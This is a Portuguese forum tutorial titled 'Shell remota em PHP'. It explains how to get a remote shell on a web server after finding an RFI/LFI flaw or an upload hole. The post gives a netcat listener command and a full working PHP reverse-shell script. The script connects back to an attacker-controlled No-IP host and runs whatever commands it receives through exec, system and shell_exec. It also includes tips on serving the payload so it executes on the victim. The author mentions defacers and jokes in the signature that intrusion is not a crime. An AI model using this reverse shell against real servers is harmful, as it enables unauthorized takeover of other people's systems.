Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Shell remota em PHP

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Shell remota em PHP

    Quando descobrimos uma vulnerabilidade do tipo RFI/LFI vemos que às vezes a inclusão de verdadeiras shells em PHP torna-se lento e pesado e incluir scripts diretos com funções de substituição de conteúdo de arquivo torna-se cansativo, pois devemos ficar alterando o conteúdo a qualquer erro.
    Mas ainda bem que existe o NetCat.
    O canivete suíço do TCP/IP já vem instalado na maioria das distros Linux, mas possui versões para Windows. BaixeApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
    Apesar de muito utilizado por alguns para acessarem prompts de comandos e brincar com o comando msg * [mensagem], pode ser utilizado também por defacers.
    Mas, para isso, precisamos já ter instalado o NetCat e rodar o seguinte comando:
    Código:
    nc  -l -p 30000 -v
    Agora precisamos, de alguma forma, executar este script no servidor, seja via LFI/RFI (PHPi), seja por upload de shell ou qualquer outra forma possível.
    Código PHP:
    <?php
    $voce 
    "voce.no-ip.com"// coloque aqui seu IP ou DNS do No-IP ou domínio
    $porta 30000// porta a conectar 

    $sock socket_create(AF_INETSOCK_STREAMSOL_TCP);
    $result socket_connect($sock$voce$porta);
    socket_write($sock"Olá, meu mestre.\n\nphp$"15);
    while (
    $out socket_read($sock4096)) 
    {
      
    exec($out$cmd);
      
    $cmdb system($out);
      
    $cmdc shell_exec($out);
      
    $cmdresult implode("\n"$cmd) . $cmdb $cmdc "\nComando executado com sucesso!\nphp$ ";
      echo 
    $cmdresult;
      
    socket_write($sock$cmdresultstrlen($cmdresult));
    }
    socket_close($sock);
    Analisando o script, veja que executamos o comando 3 vezes, usando diferentes funções. Além disso, note que a porta utilizada é a 30000. Caso queira modificá-la, modifique no script acima e no comando do NetCat anteriormente executado.

    Agora, execute o script. Lembre-se que se for usar um include remoto, a extensão do arquivo PHP em seu servidor deve ser TXT, HTML ou qualquer outra que passe ileso do interpretador, ou você estará invadindo seu próprio servidor.
    Agora, volte ao shell ou prompt e espere pela frase "Olá, meu mestre.". Aparecendo ela, que se comecem os comandos. Lembrando que variam de acordo com o sistema operacional do servidor. Note que a página onde o script está sendo executado fica carregando em loop. Quando a conexão for desfeita, pelo fechamento do shell/prompt, ela irá parar de carregar e mostrar os resultados de todos os comandos (os mesmos rodados no console).

    Até a próxima!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Similar Threads
X
Working...
X